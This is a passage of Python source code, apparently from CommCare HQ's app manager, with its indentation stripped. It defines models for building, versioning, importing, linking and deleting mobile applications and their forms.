version=copy.build_spec.version,
build_number=copy.version,
datetime=built_on,
)
copy.build_comment = comment
copy.comment_from = user_id
copy.is_released = False
prune_auto_generated_builds.delay(self.domain, self._id)
return copy
def delete_app(self):
domain_has_apps.clear(self.domain)
self.doc_type += '-Deleted'
record = DeleteApplicationRecord(
domain=self.domain,
app_id=self.id,
datetime=datetime.datetime.utcnow()
)
record.save()
return record
def save(self, response_json=None, increment_version=None, **params):
from corehq.apps.analytics.tasks import track_workflow, send_hubspot_form, HUBSPOT_SAVED_APP_FORM_ID
self.last_modified = datetime.datetime.utcnow()
if not self._rev and not domain_has_apps(self.domain):
domain_has_apps.clear(self.domain)
LatestAppInfo(self.master_id, self.domain).clear_caches()
get_all_case_properties.clear(self)
get_usercase_properties.clear(self)
request = view_utils.get_request()
user = getattr(request, 'couch_user', None)
if user and user.days_since_created == 0:
track_workflow(user.get_email(), 'Saved the App Builder within first 24 hours')
send_hubspot_form(HUBSPOT_SAVED_APP_FORM_ID, request)
super(ApplicationBase, self).save(
response_json=response_json, increment_version=increment_version, **params)
@classmethod
def save_docs(cls, docs, **kwargs):
utcnow = datetime.datetime.utcnow()
for doc in docs:
doc['last_modified'] = utcnow
super(ApplicationBase, cls).save_docs(docs, **kwargs)
bulk_save = save_docs
def set_form_versions(self):
# by default doing nothing here is fine.
pass
def set_media_versions(self):
pass
def get_build_langs(self, build_profile_id=None):
if build_profile_id is not None:
return self.build_profiles[build_profile_id].langs
else:
return self.langs
def validate_lang(lang):
if not re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang):
raise ValueError("Invalid Language")
class SavedAppBuild(ApplicationBase):
def releases_list_json(self, timezone):
"""
returns minimum possible data that could be used to list a Build on releases page on HQ
:param timezone: timezone expected for timestamps in result
:return: data dict
"""
data = super(SavedAppBuild, self).to_json().copy()
# ignore details that are not used
for key in ('modules', 'user_registration', 'external_blobs',
'_attachments', 'profile', 'translations',
'description', 'short_description', 'multimedia_map', 'media_language_map'):
data.pop(key, None)
built_on_user_time = ServerTime(self.built_on).user_time(timezone)
data.update({
'id': self.id,
'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
'menu_item_label': self.built_with.get_menu_item_label(),
'jar_path': self.get_jar_path(),
'short_name': self.short_name,
'enable_offline_install': self.enable_offline_install,
})
comment_from = data['comment_from']
if comment_from:
data['comment_user_name'] = get_display_name_for_user_id(
self.domain, comment_from, default=comment_from)
return data
class Application(ApplicationBase, TranslationMixin, ApplicationMediaMixin,
ApplicationIntegrationMixin):
"""
An Application that can be created entirely through the online interface
"""
modules = SchemaListProperty(ModuleBase)
name = StringProperty()
# profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
# ended up not using a schema because properties is a reserved word
profile = DictProperty()
use_custom_suite = BooleanProperty(default=False)
custom_base_url = StringProperty()
cloudcare_enabled = BooleanProperty(default=False)
translation_strategy = StringProperty(default='select-known',
choices=list(app_strings.CHOICES.keys()))
auto_gps_capture = BooleanProperty(default=False)
date_created = DateTimeProperty()
created_from_template = StringProperty()
use_grid_menus = BooleanProperty(default=False)
grid_form_menus = StringProperty(default='none',
choices=['none', 'all', 'some'])
add_ons = DictProperty()
smart_lang_display = BooleanProperty() # null means none set so don't default to false/true
def has_modules(self):
return len(self.modules) > 0 and not self.is_remote_app()
@property
@memoized
def commtrack_enabled(self):
if settings.UNIT_TESTING:
return False # override with .tests.util.commtrack_enabled
domain_obj = Domain.get_by_name(self.domain) if self.domain else None
return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
data.pop('commtrack_enabled', None) # Remove me after migrating apps
data['modules'] = [module for module in data.get('modules', [])
if module.get('doc_type') != 'CareplanModule']
self = super(Application, cls).wrap(data)
# make sure all form versions are None on working copies
if not self.copy_of:
for form in self.get_forms():
form.version = None
# weird edge case where multimedia_map gets set to null and causes issues
if self.multimedia_map is None:
self.multimedia_map = {}
return self
def save(self, *args, **kwargs):
super(Application, self).save(*args, **kwargs)
# Import loop if this is imported at the top
# TODO: revamp so signal_connections <- models <- signals
from corehq.apps.app_manager import signals
from couchforms.analytics import get_form_analytics_metadata
for xmlns in self.get_xmlns_map():
get_form_analytics_metadata.clear(self.domain, self._id, xmlns)
signals.app_post_save.send(Application, application=self)
def make_reversion_to_copy(self, copy):
app = super(Application, self).make_reversion_to_copy(copy)
for form in app.get_forms():
# reset the form's validation cache, since the form content is
# likely to have changed in the revert!
form.clear_validation_cache()
form.version = None
app.build_broken = False
return app
@property
def profile_url(self):
return self.hq_profile_url
@absolute_url_property
def suite_url(self):
return reverse('download_suite', args=[self.domain, self.get_id])
@property
def suite_loc(self):
if self.enable_relative_suite_path:
return './suite.xml'
else:
return "jr://resource/suite.xml"
@absolute_url_property
def media_suite_url(self):
return reverse('download_media_suite', args=[self.domain, self.get_id])
@property
def media_suite_loc(self):
if self.enable_relative_suite_path:
return "./media_suite.xml"
else:
return "jr://resource/media_suite.xml"
@property
def default_language(self):
return self.langs[0] if len(self.langs) > 0 else "en"
def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
if not form:
form = self.get_module(module_id).get_form(form_id)
return form.validate_form().render_xform(build_profile_id)
def set_form_versions(self):
"""
Set the 'version' property on each form as follows to the current app version if the form is new
or has changed since the last build. Otherwise set it to the version from the last build.
"""
def _hash(val):
return hashlib.md5(val).hexdigest()
previous_version = self.get_previous_version()
if previous_version:
force_new_version = self.build_profiles != previous_version.build_profiles
for form_stuff in self.get_forms(bare=False):
filename = 'files/%s' % self.get_form_filename(**form_stuff)
form = form_stuff["form"]
if not force_new_version:
try:
previous_form = previous_version.get_form(form.unique_id)
# take the previous version's compiled form as-is
# (generation code may have changed since last build)
previous_source = previous_version.fetch_attachment(filename, return_bytes=True)
except (ResourceNotFound, FormNotFoundException):
form.version = None
else:
previous_hash = _hash(previous_source)
# hack - temporarily set my version to the previous version
# so that that's not treated as the diff
previous_form_version = previous_form.get_version()
form.version = previous_form_version
my_hash = _hash(self.fetch_xform(form=form))
if previous_hash != my_hash:
form.version = None
else:
form.version = None
def set_media_versions(self):
"""
Set the media version numbers for all media in the app to the current app version
if the media is new or has changed since the last build. Otherwise set it to the
version from the last build.
"""
# access to .multimedia_map is slow
previous_version = self.get_previous_version()
prev_multimedia_map = previous_version.multimedia_map if previous_version else {}
for path, map_item in six.iteritems(self.multimedia_map):
prev_map_item = prev_multimedia_map.get(path, None)
if prev_map_item and prev_map_item.unique_id:
# Re-use the id so CommCare knows it's the same resource
map_item.unique_id = prev_map_item.unique_id
if (prev_map_item and prev_map_item.version
and prev_map_item.multimedia_id == map_item.multimedia_id):
map_item.version = prev_map_item.version
else:
map_item.version = self.version
def ensure_module_unique_ids(self, should_save=False):
"""
Creates unique_ids for modules that don't have unique_id attributes
should_save: the doc will be saved only if should_save is set to True
WARNING: If called on the same doc in different requests without saving,
this function will set different uuid each time,
likely causing unexpected behavior
"""
if any(not mod.unique_id for mod in self.modules):
for mod in self.modules:
mod.get_or_create_unique_id()
if should_save:
self.save()
def create_app_strings(self, lang, build_profile_id=None):
gen = app_strings.CHOICES[self.translation_strategy]
if lang == 'default':
return gen.create_default_app_strings(self, build_profile_id)
else:
return gen.create_app_strings(self, lang)
@property
def skip_validation(self):
properties = (self.profile or {}).get('properties', {})
return properties.get('cc-content-valid', 'yes')
@property
def jad_settings(self):
s = super(Application, self).jad_settings
s.update({
'Skip-Validation': self.skip_validation,
})
return s
@time_method()
def create_profile(self, is_odk=False, with_media=False,
template='app_manager/profile.xml', build_profile_id=None, target_commcare_flavor=None):
self__profile = self.profile
app_profile = defaultdict(dict)
for setting in commcare_settings.get_custom_commcare_settings():
setting_type = setting['type']
setting_id = setting['id']
if setting_type not in ('properties', 'features'):
setting_value = None
elif setting_id not in self__profile.get(setting_type, {}):
if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
setting_value = setting['default']
else:
setting_value = None
else:
setting_value = self__profile[setting_type][setting_id]
if setting_value:
app_profile[setting_type][setting_id] = {
'value': setting_value,
'force': setting.get('force', False)
}
# assert that it gets explicitly set once per loop
del setting_value
if self.case_sharing:
app_profile['properties']['server-tether'] = {
'force': True,
'value': 'sync',
}
logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
for logo_name in logo_refs:
app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
'force': True,
'value': self.logo_refs[logo_name]['path'],
}
if toggles.MOBILE_RECOVERY_MEASURES.enabled(self.domain):
app_profile['properties']['recovery-measures-url'] = {
'force': True,
'value': self.recovery_measures_url,
}
if with_media:
profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
else:
profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')
if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
app_profile['custom_properties'].update(self__profile['custom_properties'])
apk_heartbeat_url = self.heartbeat_url
locale = self.get_build_langs(build_profile_id)[0]
target_package_id = {
TARGET_COMMCARE: 'org.commcare.dalvik',
TARGET_COMMCARE_LTS: 'org.commcare.lts',
}.get(target_commcare_flavor)
return render_to_string(template, {
'is_odk': is_odk,
'app': self,
'profile_url': profile_url,
'app_profile': app_profile,
'cc_user_domain': cc_user_domain(self.domain),
'include_media_suite': with_media,
'uniqueid': self.master_id,
'name': self.name,
'descriptor': "Profile File",
'build_profile_id': build_profile_id,
'locale': locale,
'apk_heartbeat_url': apk_heartbeat_url,
'target_package_id': target_package_id,
}).encode('utf-8')
@property
def custom_suite(self):
try:
return self.lazy_fetch_attachment('custom_suite.xml')
except ResourceNotFound:
return ""
def set_custom_suite(self, value):
self.put_attachment(value, 'custom_suite.xml')
def create_suite(self, build_profile_id=None):
self.assert_app_v2()
return SuiteGenerator(self, build_profile_id).generate_suite()
def create_media_suite(self, build_profile_id=None):
return MediaSuiteGenerator(self, build_profile_id).generate_suite()
@memoized
def get_practice_user_id(self, build_profile_id=None):
# returns app or build profile specific practice_mobile_worker_id
if build_profile_id:
build_spec = self.build_profiles[build_profile_id]
return build_spec.practice_mobile_worker_id
else:
return self.practice_mobile_worker_id
@property
@memoized
def enable_practice_users(self):
return (
self.supports_practice_users and
domain_has_privilege(self.domain, privileges.PRACTICE_MOBILE_WORKERS)
)
@property
@memoized
def enable_update_prompts(self):
return (
# custom for ICDS until ICDS users are > 2.38
(self.supports_update_prompts or toggles.ICDS.enabled(self.domain)) and
toggles.PHONE_HEARTBEAT.enabled(self.domain)
)
@memoized
def get_practice_user(self, build_profile_id=None):
"""
kwargs:
build_profile_id: id of a particular build profile to get the practice user for
If it's None, practice user of the default app is returned
Returns:
App or build profile specific practice user and validates that the user is
a practice mode user and that user belongs to app.domain
This is memoized to avoid refetching user when validating app, creating build files and
generating suite file.
"""
practice_user_id = self.get_practice_user_id(build_profile_id=build_profile_id)
if practice_user_id:
return get_and_assert_practice_user_in_domain(practice_user_id, self.domain)
else:
return None
@time_method()
def create_practice_user_restore(self, build_profile_id=None):
"""
Returns:
Returns restore xml as a string for the practice user of app or
app profile specfied by build_profile_id
Raises a PracticeUserException if the user is not practice user
"""
from corehq.apps.ota.models import DemoUserRestore
if not self.enable_practice_users:
return None
user = self.get_practice_user(build_profile_id)
if user:
user_restore = DemoUserRestore.objects.get(id=user.demo_restore_id)
return user_restore.get_restore_as_string()
else:
return None
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
return 'modules-%s/forms-%s.xml' % (module.id, form.id)
@time_method()
def _make_language_files(self, prefix, build_profile_id):
return {
"{}{}/app_strings.txt".format(prefix, lang): self.create_app_strings(lang, build_profile_id).encode('utf-8')
for lang in ['default'] + self.get_build_langs(build_profile_id)
}
@time_method()
def _get_form_files(self, prefix, build_profile_id):
files = {}
for form_stuff in self.get_forms(bare=False):
def exclude_form(form):
return isinstance(form, ShadowForm) or form.is_a_disabled_release_form()
if not exclude_form(form_stuff['form']):
filename = prefix + self.get_form_filename(**form_stuff)
form = form_stuff['form']
try:
files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
except XFormValidationFailed:
raise XFormException(_('Unable to validate the forms due to a server error. '
'Please try again later.'))
except XFormException as e:
raise XFormException(_('Error in form "{}": {}').format(trans(form.name), six.text_type(e)))
return files
@time_method()
@memoized
def create_all_files(self, build_profile_id=None):
self.set_form_versions()
self.set_media_versions()
prefix = '' if not build_profile_id else build_profile_id + '/'
files = {
'{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
'{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
'{}media_profile.xml'.format(prefix):
self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
'{}media_profile.ccpr'.format(prefix):
self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
'{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
'{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
}
if self.target_commcare_flavor != 'none':
files['{}profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=False,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
files['{}profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=True,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
files['{}media_profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=False,
with_media=True,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
files['{}media_profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=True,
with_media=True,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
practice_user_restore = self.create_practice_user_restore(build_profile_id)
if practice_user_restore:
files.update({
'{}practice_user_restore.xml'.format(prefix): practice_user_restore
})
files.update(self._make_language_files(prefix, build_profile_id))
files.update(self._get_form_files(prefix, build_profile_id))
return files
get_modules = IndexedSchema.Getter('modules')
@parse_int([1])
def get_module(self, i):
try:
return self.modules[i].with_id(i % len(self.modules), self)
except IndexError:
raise ModuleNotFoundException()
def get_module_by_unique_id(self, unique_id, error=''):
def matches(module):
return module.get_or_create_unique_id() == unique_id
for obj in self.get_modules():
if matches(obj):
return obj
if not error:
error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
app_name=self.name, unique_id=unique_id)
raise ModuleNotFoundException(error)
def get_module_index(self, unique_id):
for index, module in enumerate(self.get_modules()):
if module.unique_id == unique_id:
return index
error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
app_name=self.name, unique_id=unique_id)
raise ModuleNotFoundException(error)
def get_report_modules(self):
for module in self.modules:
if isinstance(module, ReportModule):
yield module
def get_forms(self, bare=True):
for module in self.get_modules():
for form in module.get_forms():
yield form if bare else {
'type': 'module_form',
'module': module,
'form': form
}
def get_form(self, form_unique_id, bare=True):
def matches(form):
return form.get_unique_id() == form_unique_id
for obj in self.get_forms(bare):
if matches(obj if bare else obj['form']):
return obj
raise FormNotFoundException(
("Form in app '%s' with unique id '%s' not found"
% (self.id, form_unique_id)))
def get_form_location(self, form_unique_id):
for m_index, module in enumerate(self.get_modules()):
for f_index, form in enumerate(module.get_forms()):
if form_unique_id == form.unique_id:
return m_index, f_index
raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, form_unique_id))
@classmethod
def new_app(cls, domain, name, lang="en"):
app = cls(domain=domain, modules=[], name=name, langs=[lang], date_created=datetime.datetime.utcnow())
return app
def add_module(self, module):
self.modules.append(module)
return self.get_module(-1)
def delete_module(self, module_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
except ModuleNotFoundException:
return None
record = DeleteModuleRecord(
domain=self.domain,
app_id=self.id,
module_id=module.id,
module=module,
datetime=datetime.datetime.utcnow()
)
del self.modules[module.id]
record.save()
return record
def new_form(self, module_id, name, lang, attachment=Ellipsis):
module = self.get_module(module_id)
return module.new_form(name, lang, attachment)
def delete_form(self, module_unique_id, form_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
form = self.get_form(form_unique_id)
except (ModuleNotFoundException, FormNotFoundException):
return None
record = DeleteFormRecord(
domain=self.domain,
app_id=self.id,
module_unique_id=module_unique_id,
form_id=form.id,
form=form,
datetime=datetime.datetime.utcnow(),
)
record.save()
try:
form.pre_delete_hook()
except NotImplementedError:
pass
del module['forms'][form.id]
return record
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
if old_lang == new_lang:
return
if new_lang in self.langs:
raise AppEditingError("Language %s already exists!" % new_lang)
for i, lang in enumerate(self.langs):
if lang == old_lang:
self.langs[i] = new_lang
for profile in self.build_profiles:
for i, lang in enumerate(profile.langs):
if lang == old_lang:
profile.langs[i] = new_lang
for module in self.get_modules():
module.rename_lang(old_lang, new_lang)
_rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
modules = self.modules
try:
modules.insert(i, modules.pop(j))
except IndexError:
raise RearrangeError()
self.modules = modules
def rearrange_forms(self, to_module_id, from_module_id, i, j):
"""
The case type of the two modules conflict, the rearrangement goes through anyway.
This is intentional.
"""
to_module = self.get_module(to_module_id)
from_module = self.get_module(from_module_id)
try:
from_module.forms[j].pre_move_hook(from_module, to_module)
except NotImplementedError:
pass
try:
form = from_module.forms.pop(j)
if not isinstance(form, AdvancedForm):
if from_module.is_surveys != to_module.is_surveys:
if from_module.is_surveys:
form.requires = "case"
form.actions.update_case = UpdateCaseAction(
condition=FormActionCondition(type='always'))
else:
form.requires = "none"
form.actions.update_case = UpdateCaseAction(
condition=FormActionCondition(type='never'))
to_module.add_insert_form(from_module, form, index=i, with_source=True)
except IndexError:
raise RearrangeError()
def scrub_source(self, source):
source = update_form_unique_ids(source)
return update_report_module_ids(source)
def copy_form(self, from_module, form, to_module, rename=False):
"""
The case type of the two modules conflict,
copying (confusingly) is still allowed.
This is intentional.
"""
copy_source = deepcopy(form.to_json())
# only one form can be a release notes form, so set them to False explicitly when copying
copy_source['is_release_notes_form'] = False
copy_source['enable_release_notes'] = False
if 'unique_id' in copy_source:
del copy_source['unique_id']
if rename:
for lang, name in six.iteritems(copy_source['name']):
with override(lang):
copy_source['name'][lang] = _('Copy of {name}').format(name=name)
copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
to_app = to_module.get_app()
save_xform(to_app, copy_form, form.source.encode('utf-8'))
return copy_form
@cached_property
def has_case_management(self):
for module in self.get_modules():
for form in module.get_forms():
if len(form.active_actions()) > 0:
return True
return False
@memoized
def case_type_exists(self, case_type):
return case_type in self.get_case_types()
@memoized
def get_case_types(self):
extra_types = set()
if is_usercase_in_use(self.domain):
extra_types.add(USERCASE_TYPE)
return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types
def has_media(self):
return len(self.multimedia_map) > 0
@memoized
def get_xmlns_map(self):
xmlns_map = defaultdict(list)
for form in self.get_forms():
xmlns_map[form.xmlns].append(form)
return xmlns_map
def get_forms_by_xmlns(self, xmlns, log_missing=True):
"""
Return the forms with the given xmlns.
This function could return multiple forms if there are shadow forms in the app.
"""
if xmlns == "http://code.javarosa.org/devicereport":
return []
forms = self.get_xmlns_map()[xmlns]
if len(forms) < 1:
if log_missing:
logging.error('App %s in domain %s has %s forms with xmlns %s' % (
self.get_id,
self.domain,
len(forms),
xmlns,
))
return []
non_shadow_forms = [form for form in forms if form.form_type != 'shadow_form']
assert len(non_shadow_forms) <= 1
return forms
def get_xform_by_xmlns(self, xmlns, log_missing=True):
forms = self.get_forms_by_xmlns(xmlns, log_missing)
if not forms:
return None
else:
# If there are multiple forms with the same xmlns, then all but one are shadow forms, therefore they
# all have the same xform.
return forms[0].wrapped_xform()
def get_questions(self, xmlns, langs=None, include_triggers=False, include_groups=False,
include_translations=False):
forms = self.get_forms_by_xmlns(xmlns)
if not forms:
return []
# If there are multiple forms with the same xmlns, then some of them are shadow forms, so all the questions
# will be the same.
return forms[0].get_questions(langs or self.langs, include_triggers, include_groups, include_translations)
def validate_app(self):
return ApplicationValidator(self).validate_app()
def get_profile_setting(self, s_type, s_id):
setting = self.profile.get(s_type, {}).get(s_id)
if setting is not None:
return setting
yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
for contingent in yaml_setting.get("contingent_default", []):
if check_condition(self, contingent["condition"]):
setting = contingent["value"]
if setting is not None:
return setting
if not self.build_version or self.build_version < LooseVersion(yaml_setting.get("since", "0")):
setting = yaml_setting.get("disabled_default", None)
if setting is not None:
return setting
return yaml_setting.get("default")
@quickcache(['self._id', 'self.version'])
def get_case_metadata(self):
from corehq.apps.reports.formdetails.readable import AppCaseMetadata
case_relationships = get_parent_type_map(self)
meta = AppCaseMetadata()
descriptions_dict = get_case_property_description_dict(self.domain)
for case_type, relationships in case_relationships.items():
type_meta = meta.get_type(case_type)
type_meta.relationships = relationships
for module in self.get_modules():
module.update_app_case_meta(meta)
for form in module.get_forms():
form.update_app_case_meta(meta)
for type_ in meta.case_types:
for prop in type_.properties:
prop.description = descriptions_dict.get(type_.name, {}).get(prop.name, '')
return meta
def get_subcase_types(self, case_type):
"""
Return the subcase types defined across an app for the given case type
"""
return {t for m in self.get_modules()
if m.case_type == case_type
for t in m.get_subcase_types()}
@memoized
def grid_display_for_some_modules(self):
return self.grid_form_menus == 'some'
@memoized
def grid_display_for_all_modules(self):
return self.grid_form_menus == 'all'
class RemoteApp(ApplicationBase):
"""
A wrapper for a url pointing to a suite or profile file. This allows you to
write all the files for an app by hand, and then give the url to app_manager
and let it package everything together for you.
"""
profile_url = StringProperty(default="http://")
name = StringProperty()
manage_urls = BooleanProperty(default=False)
questions_map = DictProperty(required=False)
def is_remote_app(self):
return True
@classmethod
def new_app(cls, domain, name, lang='en'):
app = cls(domain=domain, name=name, langs=[lang])
return app
def create_profile(self, is_odk=False, langs=None):
# we don't do odk for now anyway
return remote_app.make_remote_profile(self, langs)
def strip_location(self, location):
return remote_app.strip_location(self.profile_url, location)
def fetch_file(self, location):
location = self.strip_location(location)
url = urljoin(self.profile_url, location)
try:
content = urlopen(url).read()
except Exception:
raise AppEditingError('Unable to access resource url: "%s"' % url)
return location, content
def get_build_langs(self):
if self.build_profiles:
if len(list(self.build_profiles.keys())) > 1:
raise AppEditingError('More than one app profile for a remote app')
else:
# return first profile, generated as part of lazy migration
return self.build_profiles[list(self.build_profiles.keys())[0]].langs
else:
return self.langs
@classmethod
def get_locations(cls, suite):
for resource in suite.findall('*/resource'):
try:
loc = resource.findtext('location[@authority="local"]')
except Exception:
loc = resource.findtext('location[@authority="remote"]')
yield resource.getparent().tag, loc
@property
def SUITE_XPATH(self):
return 'suite/resource/location[@authority="local"]'
def create_all_files(self, build_profile_id=None):
langs_for_build = self.get_build_langs()
files = {
'profile.xml': self.create_profile(langs=langs_for_build),
}
tree = _parse_xml(files['profile.xml'])
def add_file_from_path(path, strict=False, transform=None):
added_files = []
# must find at least one
try:
tree.find(path).text
except (TypeError, AttributeError):
if strict:
raise AppEditingError("problem with file path reference!")
else:
return
for loc_node in tree.findall(path):
loc, file = self.fetch_file(loc_node.text)
if transform:
file = transform(file)
files[loc] = file
added_files.append(file)
return added_files
add_file_from_path('features/users/logo')
try:
suites = add_file_from_path(
self.SUITE_XPATH,
strict=True,
transform=(lambda suite:
remote_app.make_remote_suite(self, suite))
)
except AppEditingError:
raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))
for suite in suites:
suite_xml = _parse_xml(suite)
for tag, location in self.get_locations(suite_xml):
location, data = self.fetch_file(location)
if tag == 'xform' and langs_for_build:
try:
xform = XForm(data)
except XFormException as e:
raise XFormException('In file %s: %s' % (location, e))
xform.exclude_languages(whitelist=langs_for_build)
data = xform.render()
files.update({location: data})
return files
def make_questions_map(self):
langs_for_build = self.get_build_langs()
if self.copy_of:
xmlns_map = {}
def fetch(location):
filepath = self.strip_location(location)
return self.fetch_attachment('files/%s' % filepath, return_bytes=True)
profile_xml = _parse_xml(fetch('profile.xml'))
suite_location = profile_xml.find(self.SUITE_XPATH).text
suite_xml = _parse_xml(fetch(suite_location))
for tag, location in self.get_locations(suite_xml):
if tag == 'xform':
xform = XForm(fetch(location).decode('utf-8'))
xmlns = xform.data_node.tag_xmlns
questions = xform.get_questions(langs_for_build)
xmlns_map[xmlns] = questions
return xmlns_map
else:
return None
def get_questions(self, xmlns):
if not self.questions_map:
self.questions_map = self.make_questions_map()
if not self.questions_map:
return []
self.save()
questions = self.questions_map.get(xmlns, [])
return questions
class LinkedApplication(Application):
"""
An app that can pull changes from an app in a different domain.
"""
# This is the id of the master application
master = StringProperty()
# The following properties will overwrite their corresponding values from
# the master app everytime the new master is pulled
linked_app_translations = DictProperty() # corresponding property: translations
linked_app_logo_refs = DictProperty() # corresponding property: logo_refs
# if `uses_master_app_form_ids` is True, the form id might match the master's form id
# from a bug years ago. These should be fixed when mobile can handle the change
# https://manage.dimagi.com/default.asp?283410
uses_master_app_form_ids = BooleanProperty(default=False)
@property
@memoized
def domain_link(self):
from corehq.apps.linked_domain.dbaccessors import get_domain_master_link
return get_domain_master_link(self.domain)
def get_master_version(self):
if self.domain_link:
return get_master_app_version(self.domain_link, self.master)
@property
def master_is_remote(self):
if self.domain_link:
return self.domain_link.is_remote
def get_latest_master_release(self):
if self.domain_link:
return get_latest_master_app_release(self.domain_link, self.master)
else:
raise ActionNotPermitted
def reapply_overrides(self):
self.translations.update(self.linked_app_translations)
self.logo_refs.update(self.linked_app_logo_refs)
for key, ref in self.logo_refs.items():
mm = CommCareMultimedia.get(ref['m_id'])
self.create_mapping(mm, ref['path'], save=False)
self.save()
def import_app(app_id_or_source, domain, source_properties=None):
if isinstance(app_id_or_source, six.string_types):
soft_assert_type_text(app_id_or_source)
app_id = app_id_or_source
source = get_app(None, app_id)
source_domain = source['domain']
source = source.export_json(dump_json=False)
report_map = get_static_report_mapping(source_domain, domain)
else:
cls = get_correct_app_class(app_id_or_source)
# Don't modify original app source
app = cls.wrap(deepcopy(app_id_or_source))
source = app.export_json(dump_json=False)
report_map = {}
try:
attachments = source['_attachments']
except KeyError:
attachments = {}
finally:
source['_attachments'] = {}
if source_properties is not None:
for key, value in six.iteritems(source_properties):
source[key] = value
cls = get_correct_app_class(source)
# Allow the wrapper to update to the current default build_spec
if 'build_spec' in source:
del source['build_spec']
app = cls.from_source(source, domain)
app.date_created = datetime.datetime.utcnow()
app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)
if report_map:
for module in app.get_report_modules():
for config in module.report_configs:
try:
config.report_id = report_map[config.report_id]
except KeyError:
raise AppEditingError(
"Report {} not found in {}".format(config.report_id, domain)
)
app.save_attachments(attachments)
if not app.is_remote_app():
for _, m in app.get_media_objects():
if domain not in m.valid_domains:
m.valid_domains.append(domain)
m.save()
if not app.is_remote_app():
enable_usercase_if_necessary(app)
return app
def enable_usercase_if_necessary(app):
if any(module.uses_usercase() for module in app.get_modules()):
from corehq.apps.app_manager.util import enable_usercase
enable_usercase(app.domain)
class DeleteApplicationRecord(DeleteRecord):
app_id = StringProperty()
def undo(self):
app = ApplicationBase.get(self.app_id)
app.doc_type = app.get_doc_type()
app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module = SchemaProperty(ModuleBase)
def undo(self):
app = Application.get(self.app_id)
modules = app.modules
modules.insert(self.module_id, self.module)
app.modules = modules
app.save()
class DeleteFormRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module_unique_id = StringProperty()
form_id = IntegerProperty()
form = SchemaProperty(FormBase)
def undo(self):
app = Application.get(self.app_id)
if self.module_unique_id is not None:
name = trans(self.form.name, app.default_language, include_lang=False)
module = app.get_module_by_unique_id(
self.module_unique_id,
error=_("Could not find form '{}'").format(name)
)
else:
module = app.modules[self.module_id]
forms = module.forms
forms.insert(self.form_id, self.form)
module.forms = forms
app.save()
class GlobalAppConfig(Document):
# this should be the unique id of the app (not of a versioned copy)
app_id = StringProperty()
domain = StringProperty()
# these let mobile prompt updates for application and APK
app_prompt = StringProperty(
choices=["off", "on", "forced"],
default="off"
)
apk_prompt = StringProperty(
choices=["off", "on", "forced"],
default="off"
)
# corresponding versions to which user should be prompted to update to
apk_version = StringProperty(default=LATEST_APK_VALUE) # e.g. '2.38.0/latest'
app_version = IntegerProperty(default=LATEST_APP_VALUE)
@classmethod
def for_app(cls, app):
"""
Returns the actual config object for the app or an unsaved
default object
"""
app_id = app.master_id
res = cls.get_db().view(
"global_app_config_by_app_id/view",
key=[app_id, app.domain],
reduce=False,
include_docs=True,
).one()
if res:
return cls(res['doc'])
else:
# return default config
return cls(app_id=app_id, domain=app.domain)
def save(self, *args, **kwargs):
LatestAppInfo(self.app_id, self.domain).clear_caches()
super(GlobalAppConfig, self).save(*args, **kwargs)
class LatestEnabledBuildProfiles(models.Model):
app_id = models.CharField(max_length=255)
build_profile_id = models.CharField(max_length=255)
version = models.IntegerField()
build_id = models.CharField(max_length=255)
def expire_cache(self, domain):
get_latest_enabled_build_for_profile.clear(domain, self.build_profile_id)
get_latest_enabled_versions_per_profile.clear(self.app_id)
# backwards compatibility with suite-1.0.xml
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)
ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)
ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
